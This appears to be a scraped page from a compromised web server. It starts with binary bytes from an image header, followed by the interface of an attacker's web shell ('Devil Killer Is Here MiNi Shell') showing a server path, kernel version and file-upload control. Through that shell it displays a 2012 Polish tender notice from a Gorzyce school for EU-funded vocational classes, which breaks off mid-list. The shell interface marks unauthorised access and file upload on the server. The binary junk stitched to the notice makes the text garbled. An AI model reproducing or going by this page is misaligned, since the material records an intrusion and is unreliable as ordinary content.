JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120814/301596-N-2012.html

<p class="kh_header"><b>Gorzyce: Świadczenie usług w zakresie prowadzenia zajęć edukacyjnych oraz kursów realizowanych w projekcie pn. Podkarpacie stawia na zawodowców</b><br>
<b>Numer ogłoszenia: 301596 - 2012; data zamieszczenia: 14.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Gorzycach , ul. Żwirki i Wigury 2, 39-432 Gorzyce, woj. podkarpackie, tel. 015 8362087, faks 015 8362087.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie prowadzenia zajęć edukacyjnych oraz kursów realizowanych w projekcie pn. Podkarpacie stawia na zawodowców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - Zajęcia edukacyjne oraz kursy realizowane w Zespół Szkół im. por. Józefa Sarny w Gorzycach, ul. Żwirki i Wigury 2, 39-432 Gorzyce.
W zakres przedmiotu zamówienia wchodzi prowadzenie następujących rodzajów zajęć zgodnie z harmonogramem realizacji projektu:
1.Zajęcia dydaktyczno-wyrównawcze z fizyki;
2.Zajęcia dydaktyczno-wyrównawcze z matematyki;
3.Zajęcia dydaktyczno-wyrównawcze z języka niemieckiego;
4.Zajęcia dydaktyczne rozszerzające z języka angielskiego zawodowego; 
5.Zajęcia dydaktyczne rozszerzające z języka niemieckiego zawodowego 
6.Zajęcia rozszerzające z programowania obrabiarek CNC;
7.Zajęcia rozszerzające z obsługi programu Auto-CAD;
8.Zajęcia rozszerzające z obsługi programu Inventor;
9.Zajęcia rozszerzające z obsługi programu Edge CAM;
10.Zajęcia praktyczne z zakresu rozszerzonego CAD/CAM/CNC);
11.Przeprowadzenie szkolenia ECDL;
12.Kurs tworzenie i obsługa sieci CISCO;
13.Kurs obsługi wagi i kasy fiskalnej;
14.Kurs obsługi programów księgowo-kasowych;Zamawiający wymaga, aby Wykonawca opracował programy zajęć, skrypty, zestawy ćwiczeń, słowniczki podręczne i inne materiały dydaktyczne zgodnie z projektem, które powinny uzyskać akceptację osoby o kwalifikacjach, co najmniej równych kwalifikacjom osoby opracowującej oraz wskazanego przedstawiciela zamawiającego. Zamawiający zapewnia możliwość korzystania z pomieszczeń, sprzętu i urządzeń niezbędnych do realizacji przedmiotu zamówienia. Udostępnienie pomieszczeń, sprzętu i urządzeń nastąpi bezpłatnie z zachowaniem odpowiedzialności Wykonawcy za ich użytkowanie. Zamawiający zastrzega sobie możliwość weryfikacji czasu pracy Wykonawcy. Wykonawca przedstawi Zamawiającemu do akceptacji materiały niezbędne do realizacji przedmiotu zamówienia.

Część II - Zajęcia edukacyjne oraz kursy realizowane w Zespół Szkół Nr 1 w Nowej Dębie, ul. M. Reja 7, 39-460 Nowa Dęba, i Zespół Szkół Nr 2 w Nowej Dębie im. E. Kwiatkowskiego, ul. Kościuszki 101, 39-460 Nowa Dęba.
W zakres przedmiotu zamówienia wchodzi prowadzenie następujących rodzajów zajęć zgodnie z harmonogramem realizacji projektu::
1.Kurs z profesjonalnej stylizacji i wizualizacji;
2.Zajęcia wyrównawcze i dodatkowe z matematyki;
3.Zajęcia wyrównawczych z języka angielskiego;
4.Zajęcia wyrównawczych z języka niemieckiego;
5.Język obcy w biznesie;
6.Zajęcia edukacyjne z zakresu hotelarstwa;
Zamawiający wymaga, aby Wykonawca opracował programy zajęć, skrypty, zestawy ćwiczeń, słowniczki podręczne i inne materiały dydaktyczne zgodnie z projektem, które powinny uzyskać akceptację osoby o kwalifikacjach, co najmniej równych kwalifikacjom osoby opracowującej oraz wskazanego przedstawiciela zamawiającego. Zamawiający zapewnia możliwość korzystania z pomieszczeń, sprzętu i urządzeń niezbędnych do realizacji przedmiotu zamówienia. Udostępnienie pomieszczeń, sprzętu i urządzeń nastąpi bezpłatnie z zachowaniem odpowiedzialności Wykonawcy za ich użytkowanie. Zamawiający zastrzega sobie możliwość weryfikacji czasu pracy Wykonawcy. Wykonawca przedstawi Zamawiającemu do akceptacji materiały niezbędne do realizacji przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.53.32.00-1, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek uznaje się za spełniony jeżeli wykonawca przedstawi oświadczenie w trybie art. 22 ust. 1 Pzp.,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek uznaje się za spełniony jeżeli wykonawca przedstawi oświadczenie w trybie art. 22 ust. 1 Pzp.,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek uznaje się za spełniony jeżeli wykonawca przedstawi oświadczenie w trybie art. 22 ust. 1 Pzp.,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek uznaje się za spełniony jeżeli wykonawca przedstawi wykaz osób w którym wykaże dysponowanie osobami zdolnymi do wykonania zamówienia w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek uznaje się za spełniony jeżeli wykonawca przedstawi oświadczenie w trybie art. 22 ust. 1 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie o tym, że w ciągu ostatnich pięciu lat prowadził szkolenia współfinansowane z funduszy europejskich na kwotę łączną co najmniej 50 tys. zł brutto.
2. Formularz ofertowy.
3. Pełnomocnictwo do reprezentowania Wykonawcy w niniejszym postępowaniu oraz do podpisania umowy ( o ile nie wynika to z dokumentów rejestracyjnych).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron z zachowaniem warunków określonych w art. 144 ustawy Prawo zamówień publicznych wyrażoną na piśmie, pod rygorem nieważności takiej zmiany.
2.Zamawiający przewiduje możliwość istotnych zmian w postanowieniach zawartej umowy w stosunku do treści oferty, w przypadkach konieczności zmiany terminu realizacji umowy w związku z: 
a)brakiem środków na realizację zadania lub wystąpienia innych nieprzewidzianych przyczyn;
b)zmiany terminu realizacji projektu;
c)działaniem siły  wyższej  w rozumieniu przepisów KC.
3.Zamawiający dopuszcza możliwość zmiany osób bezpośrednio realizujących przedmiot umowy po wcześniejszym poinformowaniu przez Wykonawcę na piśmie o konieczności dokonania takiej zmiany, z zastrzeżeniem, że osoby które zostaną włączone do realizacji przedmiotu umowy będą posiadać kwalifikacje i doświadczenie, co najmniej równe kwalifikacjom i doświadczeniu określonym w specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrota.podkarpackie.pl/pl/bip/powiat/tarnobrzeski/zs_gorzyce/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1.	Zespół Szkół im. por. J. Sarny w Gorzycach
ul. Żwirki i Wigury 2
39-432 Gorzyce
tel./fax. 15/836-20-87
strona internetowa: www.zsgorzyce.pl
e-mail: zsgorzyce@wp.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2012 godzina 09:00, miejsce: W siedzibie Zamawiającego: Zespół Szkół im. por. J. Sarny w Gorzycach, ul. Żwirki i Wigury 2, 39-432 Gorzyce/sekretariat/..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Podkarpacie stawia na zawodowców, jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet IX - Rozwój wykształcenia i kompetencji w regionach Działanie 9.2. Podniesienie jakości i atrakcyjności szkolnictwa zawodowego)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia edukacyjne oraz kursy realizowane w Zespół Szkół im. por. Józefa Sarny w Gorzycach, ul. Żwirki i Wigury 2, 39-432 Gorzyce..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres przedmiotu zamówienia wchodzi prowadzenie następujących rodzajów zajęć zgodnie z harmonogramem realizacji projektu:
1.Zajęcia dydaktyczno-wyrównawcze z fizyki Charakterystyka wydatku: zajęcia wyrównawcze z fizyki Poznajemy świat z fizyką. Grupa docelowa: uczniowie kierunku technik mechanik, technik informatyk i zasadnicza szkoła zawodowa. Uzasadnienie:  kluczowe kompetencje z fizyki nabywane w gimnazjum nie pozwalają na opanowanie podstawowych  umiejętności zawodowych w zakresie  statyki, kinematyki, dynamiki, przeliczania jednostek miar, przekształcania wyrażeń, analizy i sporządzania wykresów na podstawie danych, odczytywania danych z wykresów, wyjaśniania podstawowych zjawisk fizycznych. Niski poziom umiejętności z zakresu fizyki, logicznego rozumowania i wyjaśniania zjawisk fizycznych wpływa na brak przyswajania ze zrozumieniem wiadomości z przedmiotów zawodowych oraz na obniżenie zdawalności egzaminów potwierdzających kwalifikacje zawodowe. Szczegóły organizacyjne: 20 godzin zajęć  dla każdej grupy. Wsparciem objęte będą dwie grupy po 8-10 osób w roku szkolnym 2012/2013 i dwie grupy w roku szkolnym 2013/2014. Wybór uczestników: wybrani zostaną uczniowie z najniższą średnią z fizyki w każdym typie szkoły. Do zajęć dla poszczególnych typów szkół opracowane zostaną programy zajęć i skrypt zadań uwzględniające specyfikę zawodu, których  opracowanie i wydruk będzie stanowił wkład własny niepieniężny. Skrypty będą także wykorzystywane do nauki przedmiotu po zakończeniu projektu. Zajęcia prowadzone będą w salach, których koszt wynajęcia stanowić będzie wkład własny niepieniężny.
2.Zajęcia dydaktyczno-wyrównawcze z matematyki Charakterystyka: zajęcia wyrównawcze z matematyki Matematyka w technice i ekonomii. Grupa docelowa: uczniowie kierunku technik mechanik, technik informatyk, technik ekonomista i zasadnicza szkoła zawodowa. Uzasadnienie:  kluczowe kompetencje matematyczne nabywane w gimnazjum nie pozwalają na opanowanie podstawowych  umiejętności zawodowych w zakresie obliczeń procentowych, przekształcania wyrażeń algebraicznych, przeliczania jednostek miar, obliczania odsetek, rat kredytów i lokat, analizy i sporządzania wykresów na podstawie danych, obliczania pola powierzchni i objętości brył, odczytywania danych z wykresów. Niski poziom umiejętności matematycznych i logicznego rozumowania wpływa na brak przyswajania ze zrozumieniem wiadomości z przedmiotów zawodowych oraz na obniżenie zdawalności egzaminów potwierdzających kwalifikacje zawodowe. Szczegóły organizacyjne: 20 godzin zajęć  dla każdej grupy. Wsparciem objęte będą dwie grupy po 8-10 osób w roku szkolnym 2012/2013 i dwie grupy w roku szkolnym 2013/2014. Wybór uczestników: wybrani zostaną uczniowie z najniższą średnią z matematyki w każdym typie szkoły. Do zajęć dla poszczególnych typów szkół opracowane zostaną programy zajęć i skrypt zadań uwzględniające specyfikę zawodu, których  opracowanie i wydruk będzie stanowił wkład własny niepieniężny. Skrypty będą także wykorzystywane do nauki przedmiotu po zakończeniu projektu. Zajęcia prowadzone będą w salach, których koszt wynajęcia stanowić będzie wkład własny niepieniężny.
3.Zajęcia dydaktyczno-wyrównawcze z języka niemieckiego Charakterystyka: zajęcia wyrównawcze z języka niemieckiego Poznaj język swojego sąsiada. Grupa docelowa: uczniowie kierunku technik mechanik, technik informatyk, technik ekonomista i zasadnicza szkoła zawodowa. Uzasadnienie:  uczniowie w gimnazjach, z których rekrutują sie uczniowie ZS  w Gorzycach nie mają w programie nauczania języka niemieckiego w związku z czym mają utrudniony start w naszej szkole. Znikoma ilość uczniów wybiera ten język na maturze. Język niemiecki w szkole technicznej jest nie mniej ważny od języka angielskiego, gdyż zakłady pracy, w których znajdują absolwenci szkoły kooperują z krajami niemieckojęzycznymi. Pracodawcy wielokrotnie zwracali uwagę na słabą znajomość tego języka. Szczegóły organizacyjne: 30 godzin zajęć  dla każdej grupy. Wsparciem objęte będą trzy grupy po 8-10 osób w roku szkolnym 2012/2013 i trzy grupy w roku szkolnym 2013/2014. Wybór uczestników: wybrani zostaną uczniowie z najniższą średnią z języka niemieckiego w każdym typie szkoły oraz uczniowie klas pierwszych. Do zajęć dla poszczególnych typów szkół opracowane zostaną programy zajęć i skrypty uwzględniające specyfikę zawodu, których  opracowanie i wydruk będzie stanowił wkład własny niepieniężny. Skrypty będą także wykorzystywane do nauki przedmiotu po zakończeniu projektu. Zajęcia prowadzone będą w salach, których koszt wynajęcia stanowić będzie wkład własny niepieniężny.
4.Zajęcia dydaktyczne rozszerzające z języka angielskiego zawodowego Charakterystyka: zajęcia dodatkowe branżowe z języka angielskiego dla klas o profilu technik mechanik, technik informatyk i technik ekonomista. Grupa docelowa: uczniowie poszczególnych typów szkół z oceną powyżej 3,5. Uzasadnienie: pracodawcy zgłaszają zapotrzebowanie na pracowników bardzo dobrze posługujących się językiem obcym zawodowym. Systemy sterowania maszyn i programy użytkowe wymagają dobrej znajomości języka zawodowego angielskiego. Zajęcia mają na celu udoskonalenie praktycznego zastosowania języka w sytuacjach zawodowych na stanowisku pracy. Szczegóły organizacyjne: 30 godzin zajęć  dla każdej grupy. Wsparciem objęte będą dwie grupy po 6-8 osób w roku 2013 począwszy od stycznia i dwie grupy po 6-8 osób w roku 2014 począwszy od stycznia. Do zajęć dla poszczególnych typów szkół opracowane zostaną programy zajęć i skrypty uwzględniające specyfikę zawodu, których  opracowanie i wydruk będzie stanowił wkład własny niepieniężny. Skrypty będą także wykorzystywane do nauki przedmiotu po zakończeniu projektu. Zajęcia prowadzone będą w salach, których koszt wynajęcia stanowić będzie wkład własny niepieniężny. Po zakończeniu cyklu szkoleń w roku 2013 i 2014 zostanie przeprowadzony test. Na podstawie testu zostanie wybranych 10 najlepszych uczniów w 2013 i 20 najlepszych uczniów w 2014 roku, którzy pojadą na 2 tygodniowy obóz językowy. Opiekunem ze strony ZSG na obozie będzie nauczyciel zatrudniony jako wolontariusz. Praca wolontariusza będzie stanowiła wkład własny niepieniężny.
5.Zajęcia dydaktyczne rozszerzające z języka niemieckiego zawodowego Charakterystyka: zajęcia dodatkowe branżowe z języka niemieckiego dla klas zasadniczej szkoły zawodowej. Grupa docelowa: uczniowie zasadniczej szkoły zawodowej z oceną powyżej 3,0. Uzasadnienie: głównym pracodawcą dla tej grupy absolwentów są zakłady przemysłu maszynowego Gorzyc i Stalowej Woli. Zgłaszają zapotrzebowanie na pracowników bardzo dobrze posługujących się językiem obcym zawodowym, potrafiących obsługiwać systemy sterowania maszyn w tym języku. Zajęcia mają na celu udoskonalenie praktycznego zastosowania języka w sytuacjach zawodowych na stanowisku pracy. Szczegóły organizacyjne: 30 godzin zajęć  dla każdej grupy. Wsparciem objęta będzie jedna grupa  6-8 osób w roku 2013 począwszy od stycznia i jedna grupa 6-8 osób w roku 2014 począwszy od stycznia. Do zajęć dla poszczególnych typów szkół opracowane zostaną programy zajęć i skrypty uwzględniające specyfikę zawodu, których  opracowanie i wydruk będzie stanowił wkład własny niepieniężny. Skrypty będą także wykorzystywane do nauki przedmiotu po zakończeniu projektu. Zajęcia prowadzone będą w salach, których koszt wynajęcia stanowić będzie wkład własny niepieniężny. Po zakończeniu cyklu szkoleń w roku 2013 i 2014 zostanie przeprowadzony test. Na podstawie testu zostanie wybranych 10 najlepszych uczniów w 2013 i 15 najlepszych uczniów w 2014 roku, którzy pojadą na 2 tygodniowy obóz językowy. Opiekunem ze strony ZSG na obozie będzie nauczyciel zatrudniony jako wolontariusz. Praca wolontariusza będzie stanowiła wkład własny niepieniężny.
6.Zajęcia rozszerzające z programowania obrabiarek CNC (Zajęcia rozszerzające z obsługi programu Auto-CAD, Zajęcia rozszerzające z obsługi programu Inventor, Zajęcia rozszerzające z obsługi programu Edge CAM, Zajęcia praktyczne z zakresu rozszerzonego CAD/CAM/CNC) Grupa docelowa: uczniowie Technikum Mechanicznego i Zasadniczej Szkoły Zawodowej w zawodzie operator obrabiarek skrawających. Szczegóły organizacyjne:                 
